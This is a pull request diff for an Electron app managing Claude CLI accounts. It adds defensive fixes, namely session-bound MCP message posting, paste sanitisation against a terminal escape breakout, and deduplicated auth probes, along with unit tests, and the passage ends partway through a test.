### PR TITLE
fix: pre-release hardening - adversarial-sweep findings and MCP transport binding

### DIFF
--- a/src/main/account-web/claude-cli-auth.ts
+++ b/src/main/account-web/claude-cli-auth.ts
@@ -110,7 +110,30 @@ export function parseCliAuth(raw: string): ClaudeCliAuthStatus {
  * the Electron main event loop for up to 10s each time — long enough to trip the
  * usage fetch's own 8s socket timeout. execFileAsync keeps it off the loop.
  */
-export async function readClaudeCliAuth(profileId: string): Promise<ClaudeCliAuthStatus> {
+// Overlapping probes for ONE profile share a single subprocess. The renderer
+// fires ACCOUNT_WEB_STATUS on every account-row mount, every auth-method toggle,
+// and every Sidebar session right-click, so N accounts on a panel open could boot
+// N concurrent `claude` CLI trees at once. The pre-#258 execFileSync path
+// serialised them by accident; making the probe async removed that backpressure.
+// Keyed by profileId, cleared when the probe settles — same shape as the usage
+// refreshInFlight map. Deduping also means one consumer ref per profile, not N.
+const authProbesInFlight = new Map<string, Promise<ClaudeCliAuthStatus>>()
+
+export function readClaudeCliAuth(profileId: string): Promise<ClaudeCliAuthStatus> {
+  const existing = authProbesInFlight.get(profileId)
+  if (existing) return existing
+  const probe = (async () => {
+    try {
+      return await readClaudeCliAuthUncached(profileId)
+    } finally {
+      authProbesInFlight.delete(profileId)
+    }
+  })()
+  authProbesInFlight.set(profileId, probe)
+  return probe
+}
+
+async function readClaudeCliAuthUncached(profileId: string): Promise<ClaudeCliAuthStatus> {
   // VALIDATE HERE, not only at the IPC boundary. `join` does not sandbox: with
   // `../../..` segments it walks straight out of the profiles root, and the id
   // below becomes both a filesystem path and the HOME of a spawned process. The

--- a/src/main/account-web/sign-in.ts
+++ b/src/main/account-web/sign-in.ts
@@ -687,7 +687,19 @@ export async function runSignIn(opts: RunSignInOpts): Promise<SignInState> {
         // loop now touches the page without ever scripting it, and the human can
         // actually clear the check.
         if (!(await targetIsClaudeAi(client))) { await closeQuietly(client); continue }
-        const all: CdpCookie[] = (await withTimeout<any>(client.Network.getAllCookies(), IO_CALL_TIMEOUT_MS, 'getAllCookies'))?.cookies ?? []
+        // SOFT-FAIL, like every neighbouring await. getAllCookies runs against the
+        // volatile login target on every 1.5s poll, and this file's own comments
+        // (484-487, 658-663) call a mid-navigation "No target with given id found"
+        // a NORMAL event — Cloudflare reloads the challenge once or twice. A bare
+        // await here escaped the for-loop AND the while-loop into the outer catch,
+        // which force-kills the browser and fails the sign-in: a self-inflicted
+        // abort on exactly the churn #269 exists to survive. Retry next poll, and
+        // close the client this iteration opened so a transient failure cannot leak
+        // it either.
+        let all: CdpCookie[]
+        try {
+          all = (await withTimeout<any>(client.Network.getAllCookies(), IO_CALL_TIMEOUT_MS, 'getAllCookies'))?.cookies ?? []
+        } catch { await closeQuietly(client); continue }
         const harvest = harvestClaudeCookies(all)
 
         if (!harvest.hasSessionCookie) {

--- a/src/main/conductor-mcp-server.ts
+++ b/src/main/conductor-mcp-server.ts
@@ -364,6 +364,70 @@ export function buildSessionNotFoundResponse(
   return { status: 404, body, logMessage }
 }
 
+/**
+ * GHSA-f3wv: authorize a POST /messages against the AUTHENTICATED session, not
+ * merely against a valid token.
+ *
+ * The caller has already cleared `authenticateMcpRequest` — it presented a token
+ * that proves it owns `authedSession`. But the TARGET transport is named by the
+ * query-string `sessionId`, and authenticate-only never checked that the named
+ * transport was opened UNDER `authedSession`. A caller that learned another
+ * session's transport id could therefore post MCP requests into that session's
+ * stream. Bind them here: a session may only post to a transport it owns.
+ *
+ * An owner mismatch returns the SAME 404 body as an unknown transport, so the
+ * response cannot be used as an oracle for which transport ids exist under other
+ * sessions; only the server-side log line differs, so a real cross-session
+ * attempt is still visible.
+ *
+ * Pure (maps + strings in, decision out) so the security-critical branch is
+ * unit-testable without an http.Server — see conductor-mcp-binding.test.ts.
+ */
+export type MessagePostDecision =
+  | { ok: true; transport: any }
+  | { ok: false; status: number; body: string; logMessage: string }
+
+export function authorizeMessagePost(
+  authedSession: string,
+  requestedSessionId: string | null,
+  transports: ReadonlyMap<string, any>,
+  transportOwners: ReadonlyMap<string, string>,
+  userAgent: string | undefined,
+): MessagePostDecision {
+  if (!requestedSessionId) {
+    return { ok: false, status: 400, body: 'Missing sessionId', logMessage: '[vision-mcp] POST /messages 400: missing sessionId' }
+  }
+  // Fail closed if there is somehow no authenticated session. Unreachable today —
+  // the sole caller is past the 401 gate, so authedSession is a non-empty string —
+  // but this keeps the ownership compare below from ever being empty===empty (fail
+  // OPEN) under a future refactor. Reported as 404 (no existence oracle).
+  if (!authedSession) {
+    const nf = buildSessionNotFoundResponse(requestedSessionId, transports, userAgent)
+    return { ok: false, status: nf.status, body: nf.body, logMessage: '[vision-mcp] POST /messages 404: refusing a request with no authenticated session (fail-closed)' }
+  }
+  const transport = transports.get(requestedSessionId)
+  const owner = transportOwners.get(requestedSessionId)
+  if (!transport) {
+    const nf = buildSessionNotFoundResponse(requestedSessionId, transports, userAgent)
+    return { ok: false, status: nf.status, body: nf.body, logMessage: nf.logMessage }
+  }
+  if (owner !== authedSession) {
+    // Identical body to the unknown-transport case (no existence oracle); a
+    // distinct server-side log keeps a genuine cross-session attempt visible.
+    const nf = buildSessionNotFoundResponse(requestedSessionId, transports, userAgent)
+    const ua = userAgent && userAgent.length > 0 ? userAgent.slice(0, UA_MAX_LEN) : 'unknown'
+    return {
+      ok: false,
+      status: nf.status,
+      body: nf.body,
+      logMessage:
+        `[vision-mcp] POST /messages 404: session ${authedSession.slice(0, SID_PREFIX_LEN)}… ` +
+        `may not post to a transport it does not own (sid=${requestedSessionId.slice(0, SID_PREFIX_LEN)}…) ua="${ua}"`,
+    }
+  }
+  return { ok: true, transport }
+}
+
 // Lazy-load MCP SDK to avoid import issues in test environments
 let McpServer: any = null
 let SSEServerTransport: any = null
@@ -397,6 +461,9 @@ type GetVisionManager = () => VisionManagerInterface | null
 let httpServer: http.Server | null = null
 let mcpPort: number = 0
 const transports = new Map<string, any>()
+// GHSA-f3wv: which AUTHENTICATED session opened each transport, so a POST can be
+// bound to its owner (see authorizeMessagePost). Kept in lockstep with `transports`.
+const transportOwners = new Map<string, string>()
 
 // R-DEC-3: latch so an unauthenticated request logs at most ONE warning per
 // process lifetime per bound port. Without this a probing/misconfigured client
@@ -834,9 +901,12 @@ export async function startMcpServer(port: number, getVisionManager: GetVisionMa
           res,
         )
         transports.set(transport.sessionId, transport)
+        // GHSA-f3wv: record who owns this transport so a POST can be bound to it.
+        transportOwners.set(transport.sessionId, boundSessionId)
 
         res.on('close', () => {
           transports.delete(transport.sessionId)
+          transportOwners.delete(transport.sessionId)
           logInfo(`[vision-mcp] SSE connection closed (${transports.size} remaining)`)
         })
 
@@ -851,30 +921,25 @@ export async function startMcpServer(port: number, getVisionManager: GetVisionMa
       if (req.method === 'POST' && req.url?.startsWith('/messages')) {
         const url = new URL(req.url, `http://localhost:${port}`)
         const sessionId = url.searchParams.get('sessionId')
+        const ua = req.headers['user-agent']
 
-        if (!sessionId) {
-          res.writeHead(400)
-          res.end('Missing sessionId')
+        // GHSA-f3wv: bind the target transport to the AUTHENTICATED session, not
+        // just to any valid token. #435's actionable 404 body is preserved (and
+        // reused for an owner mismatch so it is not an existence oracle).
+        const decision = authorizeMessagePost(
+          authedSession,
+          sessionId,
+          transports,
+          transportOwners,
+          typeof ua === 'string' ? ua : undefined,
+        )
+        if (!decision.ok) {
+          logError(decision.logMessage)
+          res.writeHead(decision.status, { 'Content-Type': 'text/plain; charset=utf-8' })
+          res.end(decision.body)
           return
         }
-
-        const transport = transports.get(sessionId)
-        if (!transport) {
-          // #435: log a diagnostic line and return an actionable body
-          // instead of the bare "Session not found" that the LLM used
-          // to surface verbatim. The HTTP status stays 404 so MCP
-          // clients can keep their existing reconnect heuristics.
-          const ua = req.headers['user-agent']
-          const diagnostic = buildSessionNotFoundResponse(
-            sessionId,
-            transports,
-            typeof ua === 'string' ? ua : undefined,
-          )
-          logError(diagnostic.logMessage)
-          res.writeHead(diagnostic.status, { 'Content-Type': 'text/plain; charset=utf-8' })
-          res.end(diagnostic.body)
-          return
-        }
+        const transport = decision.transport
 
         try {
           await transport.handlePostMessage(req, res)
@@ -980,6 +1045,7 @@ export function stopMcpServer(): void {
       try { transport.close?.() } catch { /* ignore */ }
     }
     transports.clear()
+    transportOwners.clear()
 
     httpServer.close()
     httpServer = null

--- a/src/main/profile-consumers.ts
+++ b/src/main/profile-consumers.ts
@@ -21,27 +21,55 @@
  * can import it without a cycle, and it is unit-testable on its own.
  */
 
-const refCounts = new Map<string, number>()
+/**
+ * A ref older than this is a LEAK, and is swept. The one consumer here is the
+ * `claude auth status` probe, bounded by a 10s subprocess timeout whose `finally`
+ * releases the ref; a ref that outlives 3x that could only be one whose release
+ * never ran (a hung/orphaned CLI that never let the promise settle). Left forever
+ * it would block the usage-page auto token-refresh AND make the profile read as
+ * "in use by a live session" that does not exist — an account that cannot be
+ * deleted until the app restarts. Expiring it bounds that consequence.
+ */
+export const PROFILE_CONSUMER_MAX_AGE_MS = 30_000
+
+interface ConsumerEntry {
+  count: number
+  /** Epoch ms after which an unreleased ref is treated as leaked. */
+  expires: number
+}
+
+const entries = new Map<string, ConsumerEntry>()
 
 /**
  * Mark `profileId` as having a live transient consumer. Returns a release
  * function; call it exactly once (in a `finally`) when the consumer is done.
  * The release is idempotent so a double-call cannot drive the count negative.
+ * Each acquire refreshes the leak-expiry window, so overlapping live probes keep
+ * the profile marked; only a ref with no release and no fresh acquire expires.
  */
 export function acquireProfileConsumer(profileId: string): () => void {
   if (!profileId) return () => { /* nothing to track */ }
-  refCounts.set(profileId, (refCounts.get(profileId) ?? 0) + 1)
+  const cur = entries.get(profileId)
+  entries.set(profileId, { count: (cur?.count ?? 0) + 1, expires: Date.now() + PROFILE_CONSUMER_MAX_AGE_MS })
   let released = false
   return () => {
     if (released) return
     released = true
-    const next = (refCounts.get(profileId) ?? 1) - 1
-    if (next <= 0) refCounts.delete(profileId)
-    else refCounts.set(profileId, next)
+    const e = entries.get(profileId)
+    if (!e) return
+    if (e.count <= 1) entries.delete(profileId)
+    else entries.set(profileId, { count: e.count - 1, expires: e.expires })
   }
 }
 
-/** True while any transient consumer holds `profileId`. */
+/** True while any transient consumer holds `profileId` (and has not leaked). */
 export function hasTransientProfileConsumer(profileId: string): boolean {
-  return !!profileId && (refCounts.get(profileId) ?? 0) > 0
+  if (!profileId) return false
+  const e = entries.get(profileId)
+  if (!e) return false
+  // Self-heal a leaked ref rather than block refresh / stranding the account
+  // forever: a consumer past the max age can only be one whose release() never
+  // ran. Sweep it on read so no timer or background sweep is needed.
+  if (Date.now() >= e.expires) { entries.delete(profileId); return false }
+  return e.count > 0
 }

--- a/src/renderer/components/AccountUsagePanel.tsx
+++ b/src/renderer/components/AccountUsagePanel.tsx
@@ -217,7 +217,7 @@ export function AccountCard({
         <p className="text-[0.8125rem] text-overlay0">No usage limits reported.</p>
       )}
 
-      {row.status === 'needs-login' && (
+      {!isInactive && row.status === 'needs-login' && (
         <div className="flex items-center justify-between gap-2">
           <span className="text-[0.8125rem] text-overlay0">{row.detail === 'session expired' ? 'Sign-in expired' : 'Not signed in'}</span>
           <button

--- a/src/renderer/components/InsightsPage.tsx
+++ b/src/renderer/components/InsightsPage.tsx
@@ -4,6 +4,7 @@ import { useAccountProfilesStore } from '../stores/accountProfilesStore'
 import { useSettingsStore } from '../stores/settingsStore'
 import { useReauthAccount } from '../hooks/useReauthAccount'
 import { authFailureStillApplies, describeAuthWindow, type ProfileAuthInfo } from '../../shared/account-auth'
+import { isAccountActive } from '../../shared/account-types'
 import { resolveAccountNameByEmail, resolveAccountName } from '../../shared/account-chip-color'
 import KpiSidebar from './KpiSidebar'
 import type { CrossAccountInsights, InsightsData } from '../types/electron'
@@ -224,6 +225,12 @@ export default function InsightsPage({ onNavigateToSessions }: InsightsPageProps
     const out: Array<{ profileId: string; name: string; error?: string }> = []
     for (const info of authInfo) {
       const profile = profiles.find((p) => p.id === info.profileId)
+      // A parked (inactive) account is intentionally never token-refreshed (#280),
+      // so its credentials lapse BY DESIGN — never nag the user to re-authenticate
+      // an account they deliberately parked (clicking would spawn a login shell
+      // pinned to it, the exact behaviour #280 set out to stop on the sibling
+      // surface). Skip known-parked profiles before either push site.
+      if (profile && !isAccountActive(profile)) continue
       const email = info.oauthEmail || info.accountEmail || profile?.accountEmail
       const name = (email ? nameForAccount(email) : null) || profile?.name || email || 'Account'
 

--- a/src/renderer/components/Sidebar.tsx
+++ b/src/renderer/components/Sidebar.tsx
@@ -595,7 +595,7 @@ export default function Sidebar({ currentView, onViewChange, collapsed, onShowHe
         onRenameFinish={handleFinishSessionRename}
         onRenameCancel={() => { setRenamingSessionId(null); setSessionRenameValue('') }}
         onClick={(e) => handleSessionClick(session.id, e)}
-        onContextMenu={(e) => { e.preventDefault(); void refreshWebSessions(session.profileId); setSessionContextMenu({ sessionId: session.id, x: e.clientX, y: e.clientY }) }}
+        onContextMenu={(e) => { e.preventDefault(); void refreshWebSessions(session.profileId ?? primaryProfileId); setSessionContextMenu({ sessionId: session.id, x: e.clientX, y: e.clientY }) }}
         isSelected={selectedSessionIds.has(session.id)}
         isFocused={focusedSessionIndex === flatIndex}
       />
@@ -1063,14 +1063,14 @@ export default function Sidebar({ currentView, onViewChange, collapsed, onShowHe
             // session with a resolved account — an SSH session's browser and
             // credentials live on another machine, and a shell-only session has
             // no /login to run.
-            hasWebSession={!!(s.profileId ?? primaryProfileId) && webSessionAccounts.has((s.profileId ?? primaryProfileId)!)}
+            hasWebSession={!s.shellOnly && !!(s.profileId ?? primaryProfileId) && webSessionAccounts.has((s.profileId ?? primaryProfileId)!)}
             onOpenArtifacts={
-              (s.profileId ?? primaryProfileId) && s.sessionType === 'local'
+              !s.shellOnly && (s.profileId ?? primaryProfileId) && s.sessionType === 'local'
                 ? () => { void window.electronAPI.accountWeb.openArtifacts((s.profileId ?? primaryProfileId)!) }
                 : undefined
             }
             onAuthenticateWeb={
-              (s.profileId ?? primaryProfileId) && s.sessionType === 'local'
+              !s.shellOnly && (s.profileId ?? primaryProfileId) && s.sessionType === 'local'
                 ? () => { void authenticateWebForSession((s.profileId ?? primaryProfileId)!) }
                 : undefined
             }

--- a/src/renderer/components/TerminalView.tsx
+++ b/src/renderer/components/TerminalView.tsx
@@ -14,7 +14,7 @@ import SshFlowOverlay from './SshFlowOverlay'
 import { shouldUseResumePicker } from '../utils/resumePicker'
 import { shouldGateAccountChoice, formatSpawnError } from '../utils/sessionLaunch'
 import { stripCursorSequences } from '../utils/terminalFormatting'
-import { isControlReportOnly, resolveContextMenuIntent, blindPasteNeedsMenu, sanitizeClipboardForPaste, isOrdinaryEditable } from '../utils/terminalInput'
+import { isControlReportOnly, resolveContextMenuIntent, blindPasteNeedsMenu, sanitizeClipboardForPaste, sanitizePasteIntoTerminal, isMouseTracking, isOrdinaryEditable } from '../utils/terminalInput'
 import TerminalContextMenu from './TerminalContextMenu'
 import { decideFollow } from '../utils/terminalScroll'
 import { getTerminalTheme } from './terminal/terminalTheme'
@@ -277,6 +277,7 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
     let unsubExit: (() => void) | null = null
     let disposeKeybindings: (() => void) | null = null
     let handleContextMenu: ((e: MouseEvent) => void) | null = null
+    let handlePaste: ((e: ClipboardEvent) => void) | null = null
     let disposed = false
     let parseTimer: ReturnType<typeof setTimeout> | null = null
     let pendingParseData = ''
@@ -904,7 +905,8 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
           // Re-sample tracking AFTER the (retried, possibly slow) clipboard read:
           // a program that started tracking the mouse during the await must open
           // the menu, not receive a decision taken while it was still a prompt.
-          const trackingNow = (term.modes?.mouseTrackingMode ?? 'none') !== 'none'
+          // Same tested seam as the first read (isMouseTracking) — never inline it.
+          const trackingNow = isMouseTracking(term)
           if (trackingNow || blindPasteNeedsMenu(text, bracketedPaste)) {
             // Ambiguous now, or multi-line into a non-bracketed prompt (which
             // submits line-by-line) — require the explicit menu click.
@@ -918,6 +920,25 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
         setCtxMenu({ x: e.clientX, y: e.clientY, hasSelection: !!term.getSelection() })
       }
       container.addEventListener('contextmenu', handleContextMenu, true)
+
+      // SANITIZE EVERY NATIVE PASTE ROUTE — sanitizeClipboardForPaste is only a
+      // true chokepoint if nothing can paste around it. readClipboardText() covers
+      // the paths CCC owns (Ctrl+V, right-click), but xterm registers its OWN
+      // 'paste' listener on the helper textarea that reads the RAW clipboard and
+      // calls paste() with no strip, and that listener is still reachable two ways:
+      // the Edit menu's {role:'paste'} -> webContents.paste(), and Ctrl+V while a
+      // modal is open (installTerminalKeybindings bails before preventDefault when
+      // hasModalOpen, so the native paste fires). Either re-opens the bracketed-
+      // paste \x1b[201~ breakout the sanitiser exists to close. Intercept in the
+      // CAPTURE phase on the container — an ancestor of the textarea, so this runs
+      // BEFORE xterm's listener; stopPropagation keeps xterm from also pasting and
+      // preventDefault stops the browser's own insertion, so the ONLY paste that
+      // reaches this terminal is the sanitised one.
+      handlePaste = (e: ClipboardEvent) => {
+        if (!term) return
+        sanitizePasteIntoTerminal(e, term)
+      }
+      container.addEventListener('paste', handlePaste, true)
     }
 
     requestAnimationFrame(initTerminal)
@@ -939,6 +960,7 @@ export default function TerminalView({ sessionId, configId, cwd, shellOnly, elev
       }
       disposeKeybindings?.()
       if (handleContextMenu) container.removeEventListener('contextmenu', handleContextMenu, true)
+      if (handlePaste) container.removeEventListener('paste', handlePaste, true)
       if (handleWheel) container.removeEventListener('wheel', handleWheel)
       resizeObserver?.disconnect()
       unsubData?.()

--- a/src/renderer/onboarding/BuiltinToolsStep.tsx
+++ b/src/renderer/onboarding/BuiltinToolsStep.tsx
@@ -39,7 +39,7 @@ const TOOLS: { k: ToolKey; icon: string; title: string; desc: string; tag?: stri
     k: 'canvas',
     icon: FRAME,
     title: 'Agent Canvas: read the rendered page',
-    desc: 'When a page is open in the Canvas pane, Claude can read what it actually looks like once laid out: element names, sizes, form state, and measured problems such as clipped text, targets too small to hit, and unreadable contrast. It can also render files from the project folders you open sessions in — nothing outside those folders, and nothing at all while the canvas is closed.',
+    desc: 'When a page is open in the Canvas pane, Claude can read what it actually looks like once laid out: element names, sizes, form state, and measured problems such as clipped text, targets too small to hit, and unreadable contrast. It can also render files from the project folders you open sessions in — nothing outside those folders. To check its own work it may lay a page out off-screen even when the Canvas pane is closed, but only ever from those same folders.',
   },
 ]
 

--- a/src/renderer/utils/terminalInput.ts
+++ b/src/renderer/utils/terminalInput.ts
@@ -73,6 +73,32 @@ export function sanitizeClipboardForPaste(text: string): string {
   return text.replace(/[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/g, '')
 }
 
+// The SINGLE paste sink for a terminal. A capture-phase 'paste' listener on the
+// terminal container funnels every native paste route here — the Edit menu's
+// {role:'paste'} -> webContents.paste(), and Ctrl+V past a modal (where the
+// keybinding bails before preventDefault) — so xterm's own listener, which reads
+// the RAW clipboard and pastes it unstripped, never runs. Without this the
+// sanitiser was not actually a chokepoint and the bracketed-paste \x1b[201~
+// breakout stayed open on those routes.
+//
+// Extracted (not inlined in TerminalView) so the WIRING is unit-testable: a
+// dropped preventDefault/stopPropagation (xterm would then also paste the raw
+// text) or a dropped sanitise dies in a test, not in production — the #145 lesson
+// this whole file is built around. Returns the text it pasted, for assertions.
+export function sanitizePasteIntoTerminal(
+  e: { preventDefault: () => void; stopPropagation: () => void; clipboardData?: { getData: (type: string) => string } | null },
+  term: { paste: (text: string) => void },
+): string {
+  // Claim the event before anything else can act on it: preventDefault stops the
+  // browser's own insertion, stopPropagation stops xterm's descendant listener
+  // from reading the raw clipboard and pasting a second, unsanitised copy.
+  e.preventDefault()
+  e.stopPropagation()
+  const clean = sanitizeClipboardForPaste(e.clipboardData?.getData('text/plain') ?? '')
+  if (clean) term.paste(clean)
+  return clean
+}
+
 // Should a BLIND paste (classic right-click with nothing selected — the only
 // paste the user did not explicitly pick from a menu) be routed through the
 // context menu for confirmation instead?
@@ -98,6 +124,16 @@ export function blindPasteNeedsMenu(text: string, bracketedPasteActive: boolean)
   return /[\r\n]/.test(text)
 }
 
+// The live mouse-tracking read, as ONE tested expression. Both
+// resolveContextMenuIntent AND TerminalView's post-await re-sample call it, so a
+// one-character flip of the compare (!== 'none' -> === 'none') dies in a unit
+// test on either path instead of silently resurrecting the blind-paste-at-a-TUI
+// defect from an inlined duplicate — the #145 lesson the extraction exists to
+// honour. It was defeated once already: the re-sample was re-implemented inline.
+export function isMouseTracking(term: { modes?: { mouseTrackingMode?: string } }): boolean {
+  return (term.modes?.mouseTrackingMode ?? 'none') !== 'none'
+}
+
 // Resolve what a right-click should do from the terminal's LIVE modes. Extracted
 // from TerminalView so the glue — reading term.modes and mapping it into
 // decideContextMenuAction's inputs — is unit-testable and mutation-catchable. The
@@ -111,7 +147,7 @@ export function resolveContextMenuIntent(
   },
   classicMode: boolean,
 ): { action: 'copy' | 'paste' | 'menu'; mouseTracking: boolean; bracketedPaste: boolean } {
-  const mouseTracking = (term.modes?.mouseTrackingMode ?? 'none') !== 'none'
+  const mouseTracking = isMouseTracking(term)
   const hasSelection = !!term.getSelection()
   return {
     action: decideContextMenuAction({ hasSelection, classicMode, mouseTracking }),

--- a/tests/unit/account-web-cloudflare.test.ts
+++ b/tests/unit/account-web-cloudflare.test.ts
@@ -131,4 +131,31 @@ describe('runSignIn — no page script while the challenge is unsolved (#269)', 
 
     expect(mid.notice).toBeUndefined()
   })
+
+  it('survives a transient getAllCookies failure — retries next poll, does not kill the browser', async () => {
+    // getAllCookies runs against the volatile login target on every poll. A
+    // mid-navigation rejection (Cloudflare reloads the challenge; the target dies
+    // and returns "No target with given id found") must be soft: pre-fix the bare
+    // await escaped the for-loop AND the while-loop into the outer catch, which
+    // force-kills the browser and returns 'failed' — aborting the sign-in on
+    // exactly the churn #269 exists to survive. Here the first two polls' cookie
+    // reads throw; the third grants the session. The run must still COMPLETE.
+    let polls = 0
+    const evaluate = vi.fn(async () => ({ result: { value: 'me@example.com' } }))
+    _setCdpForTest(makeCdp({
+      targets: [LOGIN, CF_FRAME],
+      cookiesFor: () => {
+        polls++
+        if (polls <= 2) throw new Error('No target with given id found')
+        return [sessionCookie]
+      },
+      evaluate,
+    }))
+
+    const s = await runSignIn({ ...RUN, timeoutMs: 3000 })
+
+    expect(s.phase).toBe('done')
+    expect(s.session?.accountEmail).toBe('me@example.com')
+    expect(evaluate).toHaveBeenCalledTimes(1)
+  })
 })

--- a/tests/unit/claude-cli-auth-read.test.ts
+++ b/tests/unit/claude-cli-auth-read.test.ts
@@ -117,4 +117,31 @@ describe('readClaudeCliAuth — CLI probe preferred, and registered as a consume
     await readClaudeCliAuth(ID)
     expect(hasTransientProfileConsumer(ID)).toBe(false)
   })
+
+  it('coalesces overlapping probes for one profile into a single subprocess', async () => {
+    // Making the probe async removed the execFileSync serialisation, so a panel
+    // opening N accounts could fan out N concurrent `claude` trees. Two overlapping
+    // probes for the same profile must share ONE subprocess (and one consumer ref).
+    fs.mkdirSync(join(root, ID), { recursive: true })
+    let calls = 0
+    let pending: ExecCb | null = null
+    execFileImpl = (_c, _a, _o, cb) => { calls++; pending = cb }
+
+    const p1 = readClaudeCliAuth(ID)
+    const p2 = readClaudeCliAuth(ID)
+    expect(calls).toBe(1)                       // one subprocess covers both callers
+    expect(hasTransientProfileConsumer(ID)).toBe(true) // and exactly one consumer ref
+
+    pending!(null, { stdout: JSON.stringify({ loggedIn: true, email: 'a@example.com' }), stderr: '' })
+    const [r1, r2] = await Promise.all([p1, p2])
+    expect(r1.email).toBe('a@example.com')
+    expect(r2.email).toBe('a@example.com')
+    expect(hasTransientProfileConsumer(ID)).toBe(false) // released once, not leaked
+
+    // The in-flight entry clears on settle, so a later probe is not blocked.
+    const p3 = readClaudeCliAuth(ID)
+    expect(calls).toBe(2)
+    pending!(null, { stdout: JSON.stringify({ loggedIn: true }), stderr: '' })
+    await p3
+  })
 })

--- a/tests/unit/main/conductor-mcp-binding.test.ts
+++ b/tests/unit/main/conductor-mcp-binding.test.ts
@@ -1,0 +1,85 @@
+/**
+ * GHSA-f3wv: POST /messages must bind the target transport to the AUTHENTICATED
+ * session, not merely to any valid token. `authorizeMessagePost` is the pure
+ * decision the request handler delegates to; these pin the security branch —
+ * a session may only post to a transport it owns — without an http.Server.
+ */
+import { describe, it, expect } from 'vitest'
+import { authorizeMessagePost } from '../../../src/main/conductor-mcp-server'
+
+const fakeTransport = { handlePostMessage: async () => {} }
+
+describe('authorizeMessagePost (GHSA-f3wv transport binding)', () => {
+  it('allows a session to post to a transport it OWNS', () => {
+    const transports = new Map([['t-A', fakeTransport]])
+    const owners = new Map([['t-A', 'session-A']])
+    const d = authorizeMessagePost('session-A', 't-A', transports, owners, undefined)
+    expect(d.ok).toBe(true)
+    if (d.ok) expect(d.transport).toBe(fakeTransport)
+  })
+
+  it('REJECTS a valid session posting to a transport owned by ANOTHER session', () => {
+    // The whole vulnerability: authenticated as A (a token A legitimately holds),
+    // but naming B's transport id in the query string. Must not be routed.
+    const transports = new Map([['t-B', fakeTransport]])
+    const owners = new Map([['t-B', 'session-B']])
+    const d = authorizeMessagePost('session-A', 't-B', transports, owners, undefined)
+    expect(d.ok).toBe(false)
+    if (!d.ok) expect(d.status).toBe(404)
+  })
+
+  it('a cross-session rejection is INDISTINGUISHABLE from an unknown transport for the same sid (no existence oracle)', () => {
+    const existsOwnedByB = authorizeMessagePost('session-A', 't-B', new Map([['t-B', fakeTransport]]), new Map([['t-B', 'session-B']]), 'ua')
+    const doesNotExist = authorizeMessagePost('session-A', 't-B', new Map(), new Map(), 'ua')
+    expect(existsOwnedByB.ok).toBe(false)
+    expect(doesNotExist.ok).toBe(false)
+    if (!existsOwnedByB.ok && !doesNotExist.ok) {
+      expect(existsOwnedByB.status).toBe(doesNotExist.status)
+      expect(existsOwnedByB.body).toBe(doesNotExist.body) // identical body → no oracle
+    }
+  })
+
+  it('logs a DISTINCT cross-session line so a genuine attempt stays visible in the logs', () => {
+    const d = authorizeMessagePost('session-A', 't-B', new Map([['t-B', fakeTransport]]), new Map([['t-B', 'session-B']]), 'claude-cli/2')
+    expect(d.ok).toBe(false)
+    if (!d.ok) {
+      expect(d.logMessage).toContain('may not post to a transport it does not own')
+      expect(d.logMessage).not.toContain('unknown transport')
+    }
+  })
+
+  it('returns an actionable 404 for a genuinely unknown transport id', () => {
+    const d = authorizeMessagePost('session-A', 't-missing', new Map(), new Map(), undefined)
+    expect(d.ok).toBe(false)
+    if (!d.ok) {
+      expect(d.status).toBe(404)
+      expect(d.logMessage).toContain('unknown transport')
+    }
+  })
+
+  it('returns 400 when no sessionId is supplied', () => {
+    const d = authorizeMessagePost('session-A', null, new Map(), new Map(), undefined)
+    expect(d.ok).toBe(false)
+    if (!d.ok) expect(d.status).toBe(400)
+  })
+
+  it('rejects a transport with NO recorded owner (fail closed)', () => {
+    // An ownerless transport must never be reachable — the owner compare treats
+    // undefined !== any real session, so it 404s.
+    const transports = new Map([['t-orphan', fakeTransport]])
+    const owners = new Map<string, string>() // no owner recorded
+    const d = authorizeMessagePost('session-A', 't-orphan', transports, owners, undefined)
+    expect(d.ok).toBe(false)
+    if (!d.ok) expect(d.status).toBe(404)
+  })
+
+  it('fails closed when there is no authenticated session (empty must not equal empty)', () => {
+    // Unreachable past the 401 gate, but the ownership compare must never be
+    // empty===empty: an empty authedSession must not reach even a (pathological)
+    // empty-owner transport.
+    const transports = new Map([['t-x', fakeTransport]])
+    const owners = new Map([['t-x', '']])
+    const d = authorizeMessagePost('', 't-x', transports, owners, undefined)
+    expect(d.ok).toBe(false)
+  })
+})

--- a/tests/unit/profile-consumers.test.ts
+++ b/tests/unit/profile-consumers.test.ts
@@ -5,8 +5,10 @@
 // token-refresh treats it like a live session and won't rotate under it. The
 // contract is ref-counted and release-idempotent — a leaked or double-released
 // count would either block refresh forever or expose the profile mid-probe.
-import { describe, it, expect } from 'vitest'
-import { acquireProfileConsumer, hasTransientProfileConsumer } from '../../src/main/profile-consumers'
+import { describe, it, expect, vi, afterEach } from 'vitest'
+import { acquireProfileConsumer, hasTransientProfileConsumer, PROFILE_CONSUMER_MAX_AGE_MS } from '../../src/main/profile-consumers'
+
+afterEach(() => { vi.useRealTimers() })
 
 describe('profile-consumers', () => {
   it('is not in use until acquired, and is once acquired', () => {
@@ -43,5 +45,34 @@ describe('profile-consumers', () => {
     const release = acquireProfileConsumer('')
     expect(hasTransientProfileConsumer('')).toBe(false)
     release()
+  })
+
+  it('self-heals a leaked ref: a consumer that never releases expires after the max age', () => {
+    // A hung/orphaned probe can leave release() unrun. Without a sweep the profile
+    // stays "in use" forever — refresh never fires and the account cannot be
+    // deleted. hasTransientProfileConsumer must expire it once past the window.
+    vi.useFakeTimers()
+    vi.setSystemTime(0)
+    const id = 'profile-leak-9'
+    acquireProfileConsumer(id) // deliberately never released
+    expect(hasTransientProfileConsumer(id)).toBe(true)
+    vi.setSystemTime(PROFILE_CONSUMER_MAX_AGE_MS - 1)
+    expect(hasTransientProfileConsumer(id)).toBe(true)  // still inside the window
+    vi.setSystemTime(PROFILE_CONSUMER_MAX_AGE_MS)
+    expect(hasTransientProfileConsumer(id)).toBe(false) // leaked ref swept
+  })
+
+  it('a fresh acquire refreshes the window, so an overlapping live probe is not swept', () => {
+    vi.useFakeTimers()
+    vi.setSystemTime(0)
+    const id = 'profile-overlap-7'
+    const r1 = acquireProfileConsumer(id)
+    // A second probe starts just before the first would expire, extending the window.
+    vi.setSystemTime(PROFILE_CONSUMER_MAX_AGE_MS - 1)
+    const r2 = acquireProfileConsumer(id)
